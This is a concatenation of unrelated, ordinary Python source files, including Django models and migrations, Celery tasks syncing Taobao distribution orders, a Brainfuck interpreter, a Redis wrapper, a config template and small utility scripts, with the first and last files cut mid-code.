        self.handiF = 0
        self.player = 'x'
    @property
    def size(self):
        # Board dimensions as a dict (height first).
        return {"height":self.h, "width": self.w}
    def rollback(self, x, flag = 0):
        """Undo the last `x` moves using the recorded MOVE dicts.

        flag=1 is the internal mode used by move() when cancelling the move it
        has just applied (the turn has not been handed over yet).
        """
        print("Rollbacks were done", x, flag)
        if x > len(self.moves):
            raise ValueError()
        for i in range(x):
            MOVE = self.moves.pop()
            if not MOVE:
                # An empty record is a pass: just give the turn back.
                self.player = 'x' if self.player == 'o' else 'o'
                continue
            # Restore the snapshotted board, then unwind the cluster edits.
            self.board = [list(i) for i in MOVE['board'].split("\n")]
            player = self.x_clusters if self.player == ('o' if not flag else 'x') else self.o_clusters
            if MOVE['cluster']:
                player.remove(MOVE['cluster'])
            if MOVE['merges']:
                player.remove(MOVE['merges'][1])
                player += MOVE['merges'][0]
            opposite = self.o_clusters if self.player == ('o' if not flag else 'x') else self.x_clusters
            if MOVE['deletions']:
                opposite += MOVE['deletions']
            for k in MOVE['reductions']:
                for _ in k[1]:
                    opposite[opposite.index(k[0])].liberty.add(_)
            for l in MOVE['lib_change']:
                # print(MOVE['lib_change'])
                ff = player.index(l[0])
                # NOTE(review): append() while undoing looks inverted -- one
                # would expect the played stone to be *removed* from pieces;
                # confirm against the game tests.
                player[ff].pieces.append(MOVE['move_loc'])
                for p in l[1]:
                    if p[0] == '-':
                        player[ff].liberty.add(p[1])
                    else:
                        player[ff].liberty.discard(p[1])
            if flag == 1:
                if self.player == 'x':
                    self.x_clusters = player
                    self.o_clusters = opposite
                else:
                    self.x_clusters = opposite
                    self.o_clusters = player
            else:
                if self.player == 'o':
                    self.x_clusters = player
                    self.o_clusters = opposite
                    self.player = 'x'
                else:
                    self.x_clusters = opposite
                    self.o_clusters = player
|
# Generated by Django 3.1.4 on 2020-12-16 05:39
import datetime
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the core app: Doctor, Paciente, and three
    per-patient measurement tables (direct sensor readings, Morisky
    questionnaire, Borg scale)."""

    initial = True

    dependencies = [
    ]

    operations = [
        # Doctors are keyed directly by their 8-digit DNI.
        migrations.CreateModel(
            name='Doctor',
            fields=[
                ('dni', models.IntegerField(default=10000000, primary_key=True, serialize=False, validators=[django.core.validators.MinValueValidator(10000000), django.core.validators.MaxValueValidator(99999999)])),
                ('contraseña', models.CharField(max_length=100)),
                ('Nusuarios', models.IntegerField(default=0)),
            ],
        ),
        # Patients keep their assigned doctor; SET_NULL preserves the patient
        # record if the doctor is deleted.
        migrations.CreateModel(
            name='Paciente',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('nombre', models.CharField(max_length=50, null=True)),
                ('apellido', models.CharField(max_length=50, null=True)),
                ('dni', models.IntegerField(default=10000000, validators=[django.core.validators.MinValueValidator(10000000), django.core.validators.MaxValueValidator(99999999)])),
                ('email', models.EmailField(blank=True, max_length=100)),
                ('contraseña', models.CharField(max_length=100)),
                ('telefono', models.IntegerField(blank=True, default=100000000, null=True, validators=[django.core.validators.MinValueValidator(100000000), django.core.validators.MaxValueValidator(999999999)])),
                ('doctor', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.doctor')),
            ],
        ),
        # Measurement rows cascade-delete with their patient.
        migrations.CreateModel(
            name='Parmetros_directos_sensados',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('frecuencia_cardiaca', models.FloatField(blank=True)),
                ('saturacion_de_oxigeno', models.FloatField(blank=True)),
                ('Fecha_de_la_medicion', models.DateField(default=datetime.date.today, verbose_name='Date')),
                ('Hora_de_la_medicion', models.TimeField()),
                ('Paciente', models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='core.paciente')),
            ],
        ),
        migrations.CreateModel(
            name='Parametros_Morisky',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('pregunta_1', models.BooleanField()),
                ('pregunta_2', models.BooleanField()),
                ('pregunta_3', models.BooleanField()),
                ('pregunta_4', models.BooleanField()),
                ('pregunta_5', models.IntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(5)])),
                ('Fecha_de_la_medicion', models.DateField(default=datetime.date.today, verbose_name='Date')),
                ('Paciente', models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='core.paciente')),
            ],
        ),
        migrations.CreateModel(
            name='Parametros_Borg',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('puntaje', models.IntegerField(default=1, validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(10)])),
                ('Fecha_de_la_medicion', models.DateField(default=datetime.date.today, verbose_name='Date')),
                ('Hora_de_la_medicion', models.TimeField()),
                ('Paciente', models.ForeignKey(blank=True, default=None, on_delete=django.db.models.deletion.CASCADE, to='core.paciente')),
            ],
        ),
    ]
|
# -*- coding: UTF-8 -*-
import smtplib,traceback,os,sys,time,os.path,base64
import urllib,urllib2
import redis
class RedisServer:
    """Minimal convenience wrapper around a StrictRedis connection."""

    def __init__(self, host='127.0.0.1', port=6379):
        # Remember the endpoint and open the underlying client.
        self.addr = (host, port)
        self.cache = redis.StrictRedis(host, port)

    def get(self, key):
        """Fetch the value stored under *key*."""
        return self.cache.get(key)

    def set(self, key, value, expire=None):
        """Store *value* under *key*; *expire* is presumably a TTL (passed
        through as StrictRedis.set's third argument)."""
        self.cache.set(key, value, expire)

    def delete(self, key):
        """Remove *key* from the store."""
        self.cache.delete(key)
if __name__ == '__main__':
    # Smoke check: construct a client against the default localhost:6379.
    res = RedisServer()
|
#-*- coding:utf8 -*-
import time
import datetime
import calendar
from celery.task import task
from celery.task.sets import subtask
from django.conf import settings
from shopback.fenxiao.models import PurchaseOrder,FenxiaoProduct,SubPurchaseOrder
from auth.apis.exceptions import UserFenxiaoUnuseException,TaobaoRequestException
from shopback.monitor.models import TradeExtraInfo,SystemConfig,DayMonitorStatus
from shopback.trades.models import MergeTrade
from shopback import paramconfig as pcfg
from shopback.users import Seller
from common.utils import (format_time,
format_datetime,
format_year_month,
parse_datetime,
single_instance_task)
from auth import apis
import logging
__author__ = 'meixqhi'
logger = logging.getLogger('django.request')
@task()
def saveUserFenxiaoProductTask(seller_id):
    """Page through the seller's fenxiao (distribution) products via the
    Taobao API and save each one; products no longer returned by the API are
    marked DOWN afterwards. No-op for sellers without fenxiao access."""
    seller = Seller.getSellerByVisitorId(seller_id)
    if not seller.has_fenxiao:
        return
    fenxiao_product_ids = []
    try:
        has_next = True
        cur_page = 0
        while has_next:
            response_list = apis.taobao_fenxiao_products_get(page_no=cur_page,
                                                             page_size=settings.TAOBAO_PAGE_SIZE/2,
                                                             tb_user_id=seller_id)
            products = response_list['fenxiao_products_get_response']
            if products['total_results'] > 0:
                fenxiao_product_list = products['products']['fenxiao_product']
                for fenxiao_product in fenxiao_product_list:
                    FenxiaoProduct.save_fenxiao_product_dict(seller_id,fenxiao_product)
                    fenxiao_product_ids.append(fenxiao_product['pid'])
            # Advance pagination: stop once we've covered total_results items.
            total_nums = products['total_results']
            cur_nums = cur_page*settings.TAOBAO_PAGE_SIZE/2
            has_next = cur_nums<total_nums
            cur_page += 1
    except UserFenxiaoUnuseException,exc:
        # Seller is not a fenxiao-platform user -- log and leave quietly.
        logger.warn(u'该用户非分销平台用户:%s,%s'%(str(seller_id),exc.message))
    except TaobaoRequestException,exc:
        logger.error(u'分销商品更新异常:%s'%exc.message,exc_info=True)
    else:
        # Only on full success: everything not seen in this sweep is DOWN.
        FenxiaoProduct.objects.filter(user__visitor_id=seller_id)\
            .exclude(pid__in=fenxiao_product_ids).update(status=FenxiaoProduct.DOWN)
@task(max_retries=3)
def saveUserPurchaseOrderTask(seller_id,update_from=None,update_to=None,status=None):
    """Download the seller's fenxiao purchase orders created between
    update_from and update_to (default: the last 28 days), one week per API
    sweep, and merge them into local trades. Retries (max 3) on any error."""
    seller = Seller.getSellerByVisitorId(seller_id)
    if not seller.has_fenxiao:
        return
    from shopback.trades.service import TradeService,PurchaseOrderService
    try:
        if not (update_from and update_to):
            update_from = datetime.datetime.now() - datetime.timedelta(28,0,0)
            update_to = datetime.datetime.now()
        # One iteration per (partial) week in the window.
        exec_times = (update_to - update_from).days/7+1
        for i in range(0,exec_times):
            dt_f = update_from + datetime.timedelta(i*7,0,0)
            dt_t = update_from + datetime.timedelta((i+1)*7,0,0)
            has_next = True
            cur_page = 1
            while has_next:
                response_list = apis.taobao_fenxiao_orders_get(tb_user_id=seller_id,
                                                               page_no=cur_page,
                                                               time_type='trade_time_type',
                                                               page_size=settings.TAOBAO_PAGE_SIZE/2,
                                                               start_created=dt_f,
                                                               end_created=dt_t,
                                                               status=status)
                orders_list = response_list['fenxiao_orders_get_response']
                if orders_list['total_results']>0:
                    for o in orders_list['purchase_orders']['purchase_order']:
                        modified = datetime.datetime.strptime(o['modified'],'%Y-%m-%d %H:%M:%S')
                        # Skip orders whose local copy is already newer.
                        if TradeService.isValidPubTime(seller_id,o['id'],modified):
                            purchase_order = PurchaseOrderService.savePurchaseOrderByDict(seller_id,o)
                            PurchaseOrderService.createMergeTrade(purchase_order)
                # NOTE(review): pages are fetched with page_size=PAGE_SIZE/2
                # but progress is counted with the full PAGE_SIZE -- this may
                # terminate pagination early; confirm against the API usage.
                total_nums = orders_list['total_results']
                cur_nums = cur_page*settings.TAOBAO_PAGE_SIZE
                has_next = cur_nums<total_nums
                cur_page += 1
    except Exception,exc:
        logger.error(u'分销订单下载失败:%s'%exc.message,exc_info=True)
        raise saveUserPurchaseOrderTask.retry(exc=exc,countdown=60)
@task()
def saveUserIncrementPurchaseOrderTask(seller_id,update_from=None,update_to=None):
    """Download fenxiao purchase orders *modified* in [update_from, update_to]
    (update_time_type) and merge them into local trades. No-op for sellers
    without fenxiao access."""
    seller = Seller.getSellerByVisitorId(seller_id)
    if not seller.has_fenxiao:
        return
    update_from = format_datetime(update_from)
    update_to = format_datetime(update_to)
    from shopback.trades.service import TradeService,PurchaseOrderService
    has_next = True
    cur_page = 1
    while has_next:
        response_list = apis.taobao_fenxiao_orders_get(tb_user_id=seller_id,
                                                       page_no=cur_page,
                                                       time_type='update_time_type',
                                                       page_size=settings.TAOBAO_PAGE_SIZE/2,
                                                       start_created=update_from,
                                                       end_created=update_to)
        orders_list = response_list['fenxiao_orders_get_response']
        if orders_list['total_results']>0:
            for o in orders_list['purchase_orders']['purchase_order']:
                modified = datetime.datetime.strptime(o['modified'],'%Y-%m-%d %H:%M:%S')
                # Skip orders whose local copy is already newer.
                if TradeService.isValidPubTime(seller_id,o['id'],modified):
                    purchase_order = PurchaseOrderService.savePurchaseOrderByDict(seller_id,o)
                    PurchaseOrderService.createMergeTrade(purchase_order)
        # NOTE(review): same page_size/2 vs PAGE_SIZE mismatch as in
        # saveUserPurchaseOrderTask -- confirm pagination is complete.
        total_nums = orders_list['total_results']
        cur_nums = cur_page*settings.TAOBAO_PAGE_SIZE
        has_next = cur_nums<total_nums
        cur_page += 1
@task()
def updateAllUserIncrementPurchaseOrderTask(update_from=None,update_to=None):
    """For every effective Taobao seller, run the incremental purchase-order
    download day by day over [update_from, update_to] (default: yesterday),
    skipping days already flagged done in DayMonitorStatus."""
    update_handler = update_from and update_to
    dt = datetime.datetime.now()
    if update_handler:
        time_delta = update_to - update_from
        update_days = time_delta.days+1
    else:
        # Default window: the single day ending at today's midnight.
        update_to = datetime.datetime(dt.year,dt.month,dt.day,0,0,0)
        update_days = 1
    sellers = Seller.effect_users.TAOBAO
    for user in sellers:
        for i in xrange(0,update_days):
            # Walk backwards one day at a time from update_to.
            update_start = update_to - datetime.timedelta(i+1,0,0)
            update_end = update_to - datetime.timedelta(i,0,0)
            year = update_start.year
            month = update_start.month
            day = update_start.day
            monitor_status,state = DayMonitorStatus.objects.get_or_create(user_id=user.visitor_id,
                                                                          year=year,
                                                                          month=month,
                                                                          day=day)
            try:
                if not monitor_status.update_purchase_increment:
                    saveUserIncrementPurchaseOrderTask(user.visitor_id,
                                                       update_from=update_start,
                                                       update_to=update_end)
            except Exception,exc:
                # One seller/day failing must not stop the sweep.
                logger.error('%s'%exc,exc_info=True)
            else:
                # Mark the day as successfully processed.
                monitor_status.update_purchase_increment = True
                monitor_status.save()
@single_instance_task(60*60,prefix='shopback.fenxiao.tasks.')
def updateAllUserIncrementPurchasesTask():
    """Incrementally update fenxiao-platform purchase orders for all sellers.

    Uses the system-wide fenxiao_order_updated timestamp: a full (28-day)
    download when it is missing or more than a day old, otherwise an
    incremental pass since the last run plus a refresh of orders awaiting
    shipment. Runs as a single-instance task (1h lock)."""
    dt = datetime.datetime.now()
    sysconf = SystemConfig.getconfig()
    sellers = Seller.effect_users.TAOBAO
    updated = sysconf.fenxiao_order_updated
    try:
        for user in sellers:
            if not updated:
                saveUserPurchaseOrderTask(user.visitor_id,
                                          status=pcfg.WAIT_SELLER_SEND_GOODS)
                continue
            bt_dt = dt-updated
            if bt_dt.days>=1:
                saveUserPurchaseOrderTask(user.visitor_id,
                                          status=pcfg.WAIT_SELLER_SEND_GOODS)
            else:
                saveUserIncrementPurchaseOrderTask(user.visitor_id,
                                                   update_from=updated,
                                                   update_to=dt)
                saveUserPurchaseOrderTask(user.visitor_id,
                                          status=pcfg.WAIT_SELLER_SEND_GOODS)
    except Exception,exc:
        logger.error('%s'%exc,exc_info=True)
    else:
        # Only advance the high-water mark when every seller succeeded.
        SystemConfig.objects.filter(id=sysconf.id).update(fenxiao_order_updated=dt)
|
# Generated by Django 2.2 on 2020-12-23 09:31
from django.db import migrations, models
class Migration(migrations.Migration):
    """Alter Comment.user_comment_likes: many-to-many to app1.User with the
    reverse accessor name "comment_likes"."""

    dependencies = [
        ('app1', '0002_auto_20201221_2255'),
    ]

    operations = [
        migrations.AlterField(
            model_name='comment',
            name='user_comment_likes',
            field=models.ManyToManyField(related_name='comment_likes', to='app1.User'),
        ),
    ]
|
from django.contrib.auth.models import User
from django.db import models
from django.core.exceptions import ValidationError
# Our apps:
from utils import unique_slugify
class Group(models.Model):
    """
    Users (below) may belong to a group.
    """
    name = models.CharField(verbose_name='Group name',
                            max_length=50,
                            help_text='Users might belong to a group',
                            )

    def __unicode__(self):
        # Display groups by their name in the admin / shell.
        return self.name

    class Meta:
        # Alphabetical default ordering.
        ordering = ['name', ]
class UserProfile(models.Model):
    """Per-user profile: role, course memberships, optional group, and a
    URL-friendly slug derived from the username."""
    # See https://docs.djangoproject.com/en/1.3/topics/auth/
    user = models.OneToOneField(User, unique=True, related_name="profile")

    # Slug field (auto-generated in save(); never edited by hand)
    slug = models.SlugField(editable=False)

    # User's role
    role_choice = (
        ('Superuser', 'Superuser'),       # Django superuser
        ('Instructor', 'Instructor'),     # Highest level
        ('TA', 'TA'),                     # Next highest level
        ('Student', 'Student'),           # Lowest level
        ('Contributor', 'Contributor'),   # Just to acknowledge contribs
        ('Grader', 'Grader'),             # Auto-grader
    )
    role = models.CharField(choices=role_choice, max_length=20,
                            default='Student')
    student_number = models.CharField(max_length=20, blank=True)
    courses = models.ManyToManyField('course.Course')
    group = models.ForeignKey(Group, blank=True, null=True)

    class Meta:
        verbose_name_plural = 'users'

    def save(self, *args, **kwargs):
        """ Override the model's saving function to create the slug """
        # http://docs.djangoproject.com/en/dev/topics/db/models/
        #overriding-predefined-model-methods
        unique_slugify(self, self.user.username, 'slug')

        # Call the "real" save() method.
        super(UserProfile, self).save(*args, **kwargs)

    def __unicode__(self):
        return self.slug

    def get_peers(self):
        """Return ("First Last", username) pairs for the other members of this
        user's group; empty list when the user has no group."""
        if self.group:
            userP = list(UserProfile.objects.filter(group=self.group))
            userP.remove(self)
            out = []
            for item in userP:
                out.append(('%s %s' % (item.user.first_name,
                                       item.user.last_name), item.user.username))
            return(out)
        else:
            return []
class Token(models.Model):
    """
    Manages the unique sign-in tokens. Tokens are purely for authentication of
    the user. They are never used to authorize access to any type of info.
    """
    user = models.ForeignKey(User)
    token_address = models.CharField(max_length=250)
    # Tokens are single-use; flipped once consumed.
    has_been_used = models.BooleanField(default=False)

    def __unicode__(self):
        return u'%s, %s, %s' % (str(self.has_been_used), str(self.user),
                                self.token_address)
class Timing(models.Model):
    """
    Manages the start and end times of various tests. This is the primary
    authorization mechanism.

    Timing objects are not created when the QSet requested is outside of its
    start and end time. e.g. when the user is signing in to review answers
    from prior QSets or for other courses.
    """
    user = models.ForeignKey(UserProfile)
    start_time = models.DateTimeField()
    final_time = models.DateTimeField()
    qset = models.ForeignKey('question.QSet')
    token = models.ForeignKey(Token)

    def __unicode__(self):
        return 'User %s -- Start: [%s] and Final [%s]' % \
            (self.user.slug,
             self.start_time.strftime('%H:%M:%S on %d %h %Y'),
             self.final_time.strftime('%H:%M:%S on %d %h %Y'))

    def save(self, *args, **kwargs):
        # Validate that the window is self-consistent and falls entirely
        # inside the QSet's answering window before persisting.
        if self.start_time >= self.final_time:
            raise ValidationError('Start time must be earlier than end time.')
        if self.start_time < self.qset.ans_time_start:
            raise ValidationError('Start time must be later than QSet start time.')
        if self.start_time > self.qset.ans_time_final:
            raise ValidationError('Cannot start test after QSet final time.')
        if self.final_time < self.qset.ans_time_start:
            raise ValidationError('Cannot end test before QSet start time.')
        if self.final_time > self.qset.ans_time_final:
            raise ValidationError('Cannot end test after QSet final time.')
        super(Timing, self).save(*args, **kwargs)
|
from django.db import models
# Create your models here.
class User(models.Model):
    """Minimal user record: first/last name and email address."""
    fname = models.CharField(max_length=264)
    lname = models.CharField(max_length=264)
    email = models.EmailField(max_length=264)

    def __str__(self):
        # Display as "<first> <last>".
        return ' '.join((self.fname, self.lname))
|
import wavelet97lift as dwt
def png_cmp(s,s1):
im = dwt.Image.open(s)
im1 = dwt.Image.open(s1)
pix = im.load()
m = list(im.getdata())
m = [m[i:i+im.size[0]] for i in range(0, len(m), im.size[0])]
pix1 = im1.load()
m1 = list(im1.getdata())
m1 = [m1[i:i+im.size[0]] for i in range(0, len(m1), im1.size[0])]
for row in range(0, len(m)):
for col in range(0, len(m[0])):
m[row][col] = float(m[row][col])
m1[row][col] = float(m1[row][col])
max = 0.0
mse = 0.0
for row in range(0, len(m1)):
for col in range(0, len(m1[0])):
mse = (m[row][col] - m1[row][col]) **2
d = m[row][col] - m1[row][col]
if d >= max:
max = d
#print mse
print 'mse = ',mse/(im1.size[0]*im1.size[1])
print 'max = ', max
# Compare the 256x256 reference image against its wavelet round-trip output.
png_cmp("../lena_256.png","test1_256_iwt.png")
|
# Read N and the N integers A.
N = int(input())
A = list(map(int, input().split()))

# Best total appears to be sum(|A[i]|); when an odd number of elements is
# non-positive, the smallest magnitude is paid back twice.
magnitudes = list(map(abs, A))
answer = sum(magnitudes)
non_positive = sum(1 for i in range(N) if A[i] <= 0)
if non_positive % 2 != 0:
    answer -= 2 * min(magnitudes)
print(answer)
|
"""Args to define training and optimizer hyperparameters"""
def add_args(parser):
    """Register the training/optimizer hyperparameter flags on *parser*."""
    parser.add_argument(
        '--seed',
        type=int,
        default=0,
        help='Random seed',
    )
|
import sys
# 3000-cell zero-initialised data tape for the Brainfuck machine.
BUFFER = [int(i) for i in '0' * 3000]
ip = 0 # current cell index into BUFFER (the data pointer)
# API
def inc_p():
    """'>' -- move the data pointer one cell to the right."""
    # Only `ip` is rebound; the unused `global BUFFER` declaration was dropped.
    global ip
    ip += 1
def dec_p():
    """'<' -- move the data pointer one cell to the left."""
    # Only `ip` is rebound; the unused `global BUFFER` declaration was dropped.
    global ip
    ip -= 1
def inc_b():
    """'+' -- increment the byte at the data pointer."""
    # No `global` needed: BUFFER is mutated in place and ip is only read.
    BUFFER[ip] += 1
def dec_b():
    """'-' -- decrement the byte at the data pointer."""
    # No `global` needed: BUFFER is mutated in place and ip is only read.
    BUFFER[ip] -= 1
def out_b():
    """'.' -- write the current cell to stdout as a character."""
    # Globals are only read here, so no `global` declarations are required.
    sys.stdout.write(chr(BUFFER[ip]))
def inp_b():
    """',' -- read one character of input into the current cell."""
    # Item assignment does not rebind BUFFER, so no `global` is needed.
    BUFFER[ip] = getchar()
def loop(code):
    """'[' body ']' -- re-evaluate `code` while the current cell is non-zero."""
    # Globals are only read here, so no `global` declarations are required.
    while BUFFER[ip] != 0:
        eval_brainfuck(code)
# Dispatch table mapping each Brainfuck command character to its handler.
legal_commands = {'>' : inc_p,
                  '<' : dec_p,
                  '+' : inc_b,
                  '-' : dec_b,
                  '.' : out_b,
                  ',' : inp_b,
                  '[' : loop }
# ']' has no handler: eval_brainfuck never dispatches on it, because loop()
# consumes everything up to the matching close bracket.
def getchar():
    """Return the ordinal of the first character of a line read from stdin."""
    return ord(raw_input()[0])
def no_of_occurences(code, c):
    """Count occurrences of `c` in `code` (overlapping, when `c` is longer
    than one character: the search resumes one position after each hit)."""
    count = 0
    pos = code.find(c)
    while pos != -1:
        count += 1
        pos = code.find(c, pos + 1)
    return count
def skip_occurences(code, a, times):
    """Return the index of the `times`-th (1-based) occurrence of `a` in
    `code`, or -1 when there are fewer occurrences (or times <= 0)."""
    pos = -1
    for _ in range(times):
        pos = code.find(a, pos + 1)
        if pos == -1:
            return -1
    return pos
# Note: The code gets really ugly from this point. User discretion is advised
def eval_brainfuck(code):
    """Interpret the Brainfuck program `code` against the global BUFFER/ip
    tape. Returns -1 for non-string input or an unmatched '['; loops are
    delegated to loop(), which re-enters this function for each pass."""
    if not isinstance(code, str):
        return -1
    else:
        c = 0 # loop counter
        while c < len(code):
            #print code[c], c
            if code[c] in legal_commands:
                if code[c] == '[':
                    # Find the ']' that matches this '[' by counting nested
                    # '[' between here and candidate close brackets.
                    a = 0 # another loop counter
                    depth = 0 # depth of the loop
                    # let us check that there are no loops i.e '[' inside this loop block
                    end_loop = code.find(']', c)
                    if end_loop == -1:
                        return -1
                    depth = no_of_occurences(code[c+1:end_loop], '[')
                    #print depth, code[c+1:end_loop]
                    # now we know the depth of this loop lets now figure out the ending point
                    if depth > 0:
                        # Skip past the close brackets that belong to the
                        # nested loops, then take the next ']' as ours.
                        rel_c = skip_occurences(code[c+1:], ']', depth)
                        a = rel_c + len(code[:c+1])
                        b = code.find(']', a+1)
                        if b == -1:
                            return -1
                        else:
                            depth = no_of_occurences(code[a+1:b], '[')
                            if depth > 0:
                                # We got more loops inside the parent loop
                                rel_a = skip_occurences(code[a+1:], ']', depth) # this position is relative to a+1 we want it withit relative to c+1
                                a = rel_a + a
                                b = code.find(']', a+1)
                                if b == -1:
                                    return -1
                        end_loop = b
                    # print code[c:end_loop]
                    # print c, b, a, depth
                    #print 'Calling Loop =>' , ip, code[c+1:end_loop], BUFFER[0:5]
                    loop(code[c+1:end_loop])
                    #print '\n\n----loop ends----\n\n'
                    # Resume interpretation just past the matching ']'.
                    c = end_loop
                else:
                    # Simple commands dispatch straight through the table.
                    legal_commands[code[c]]()
            c += 1
# Read one line of Brainfuck source from stdin and execute it.
eval_brainfuck(raw_input())
|
# Replace the placeholder values below with your own before running the script.
# NOTE: this template is NOT valid/importable Python until every bare
# "name = " placeholder is filled in with an actual value.
import datetime

# email details
fromaddr = # your gmail address
pwd = # RISK OF PASSWORD BREACH! DON'T PUBLISH THIS!!!
toaddr = # your recipients
Cc = # if any cc's
host = 'smtp.gmail.com'
port = 587

# email content
today = str(datetime.date.today())
# today = '2020-09-06'
filename = 'episode_performance_{}.pdf'.format(today)
filepath = # your path for the file to attach
subject = # your email subject title
body = # your email body

# set paths for local saved files
folder_path = # local saved folder
master_path = # master dataset
file = # daily snapshot of data refresh
figure_path = # daily refreshed file path

# data crawling
album_url = # url for your Ximalaya album to crawl
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'}
output_path = # path to your output folder

# parameters for failure retry
sleep_time = 60
num_retries = 5
|
# -*- coding: utf-8 -*-
# flake8: noqa
from __future__ import absolute_import, print_function, unicode_literals
from .shell import Shell
|
import sys
import commander
import shlex
import utils
from logger import L
from gv import num_version, load_config_project
from time import sleep
def main(arguments):
    """Entry point: run commander in one-shot mode when extra CLI arguments
    are present, otherwise start the interactive command loop."""
    if len(arguments) > 1:
        # BUG fix: previously forwarded the module-level `args` global instead
        # of the `arguments` parameter, which only worked when the module was
        # executed as a script (where `args` happened to exist).
        commander.main(arguments)
    else:
        utils.register_exit()
        loop()
def loop():
    """Interactive REPL.

    1. read input
    2. parse command
    3. continue
    """
    load_config_project()
    L.debug("running with version: %s", sys.version)
    while True:
        # Pick the right input primitive for the running interpreter.
        # (Removed the unused ``is_version_2`` local that was recomputed here.)
        if num_version == 2:
            response = raw_input("Enter command:")
        elif num_version == 3:
            response = input("Enter command:")
        else:
            response = ''
        if response != '':
            commander.parse(response)
        sleep(0.5)  # throttle so an empty/bad input cannot spin the CPU
def get_agrs(str_line):
    """Tokenize *str_line* shell-style (quotes respected) and return the tokens."""
    return shlex.split(str_line)
# Script entry point: normalise argv via the project helper, then dispatch.
if __name__ == "__main__":
    args = utils.get_args(sys.argv)
    main(args)
|
from subprocess import check_output
from mylcd import mylcd
from time import sleep
def get_hostname():
    """Return this machine's hostname with the trailing newline stripped."""
    raw = check_output('hostname')
    return raw.decode().strip('\n')
def get_ips():
    """Parse `ifconfig` output and return the non-empty addresses found.

    NOTE(review): this matches the legacy net-tools ``addr:x.x.x.x`` token
    format; newer ifconfig releases print ``inet x.x.x.x`` instead — confirm
    the target system.
    """
    tokens = check_output('ifconfig').decode().split()
    addresses = [tok[5:] for tok in tokens if "addr:" in tok]
    return [addr for addr in addresses if addr]
# Script entry point: show the hostname on LCD line 1 and cycle through the
# machine's IP addresses on line 2, one per second, forever.
if __name__ == '__main__':
    myLCD = mylcd()
    myLCD.LCD_boot_setup()
    myLCD.clear_line_1()
    while(True):
        myLCD.clear_line_1()
        myLCD.print_line_1(get_hostname())
        ip_list = get_ips()
        for i in ip_list :
            myLCD.clear_line_2()
            myLCD.print_line_2(i)
            sleep(1)
|
from fps import floating_point_system, graficar
def parametros(beta, t, L, U):
    """Describe the floating point system F(beta, t, L, U) and plot it."""
    numbers, N, UFL, OFL = floating_point_system(beta, t, L, U)
    resumen = "La cantidad de numeros flotantes del sistema es: {0}. El numero mas pequeño que se puede representar(UFL) es: {1} y el numero mas grande que se puede representar(OFL) es: {2}".format(N, UFL, OFL)
    print(resumen)
    graficar(numbers, N)
def main():
    """Run the two demo floating-point systems (t = 3 and t = 6 digits)."""
    for t in (3, 6):
        parametros(2, t, -3, 3)
main()
|
import pytest
from pystratis.nodes import BaseNode
from pystratis.api import APIError
from pystratis.api.rpc.responsemodels import *
@pytest.mark.integration_test
@pytest.mark.strax_integration_test
def test_call_by_name(strax_hot_node: BaseNode):
    """RPC call-by-name should wrap 'getblockcount' in RPCCommandResponseModel."""
    try:
        response = strax_hot_node.rpc.call_by_name(command='getblockcount')
        assert isinstance(response, RPCCommandResponseModel)
    except APIError:
        # RPC functionality is deprecated and works inconsistently.
        pass
@pytest.mark.integration_test
@pytest.mark.strax_integration_test
def test_list_methods(strax_hot_node: BaseNode):
    """Every entry returned by list_methods is an RPCCommandListModel."""
    methods = strax_hot_node.rpc.list_methods()
    assert isinstance(methods, list)
    for method in methods:
        assert isinstance(method, RPCCommandListModel)
|
from django.db import models
from django.contrib.auth.models import User
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from Users.models import UserInfo
from mptt.models import MPTTModel, TreeForeignKey
# Create your models here.
class CommentManager(models.Manager):
    """Manager exposing only top-level (parent-less) comments."""

    def all(self):
        # Restrict the default queryset to root comments.
        return super().filter(parent=None)

    def filter_by_instance(self, instance):
        """Root comments attached to *instance* via the generic relation."""
        ct = ContentType.objects.get_for_model(instance.__class__)
        return super().filter(content_type=ct,
                              object_id=instance.id).filter(parent=None)
class Comment(MPTTModel):
    """Threaded (MPTT) comment attachable to any model via a generic FK."""
    user = models.ForeignKey(User, on_delete=models.CASCADE)  # comment author
    content = models.TextField()
    # NOTE(review): auto_now refreshes the date on EVERY save; for a creation
    # timestamp auto_now_add is usually intended — confirm before changing
    # (a change here requires a migration).
    create_date = models.DateField(auto_now=True)
    # parent = models.ForeignKey("self", blank=True, null=True)
    parent = TreeForeignKey('self', null=True, blank=True,
                            related_name='children', db_index=True,
                            on_delete=models.CASCADE)
    # Generic relation: the object this comment is attached to.
    content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
    object_id = models.PositiveIntegerField()
    content_object = GenericForeignKey('content_type', 'object_id')
    # objects = CommentManager()
    class Meta:
        db_table = 'Comment'
    def __str__(self):
        return self.content
    def children_comment(self):
        # Direct replies to this comment.
        return Comment.objects.filter(parent=self)
    def get_user_info(self):
        # Profile record(s) for the comment's author.
        return UserInfo.objects.filter(user=self.user)
|
# this class is responsible for formatting the data requested as a string that can be used as a response by the chat bot
# each function here takes in the returned data of its corresponding data request function, as well as the full list of entities
# it returns a string that the bot should respond with
class ResponseFormat(object):
    """Format data-request results into chat-bot reply strings.

    Each formatter takes the raw result of its corresponding data-request
    function plus the wit.ai entity dict, and returns the reply text.

    BUG FIX: the methods were declared without ``self`` and without
    ``@staticmethod``, so calling them on an *instance* raised TypeError.
    They are now proper static methods; existing class-level calls
    (``ResponseFormat.getDistanceFormat(...)``) are unchanged.
    """

    @staticmethod
    def getDistanceFormat(distance, entities):
        """Distance reply for one (from here) or two locations."""
        entities = entities['wit$location:location']
        place1 = entities[0]['value']
        if len(entities) == 1:
            return "The distance to " + place1 + " is " + str(round(distance, 2)) + "km.\n"
        else:
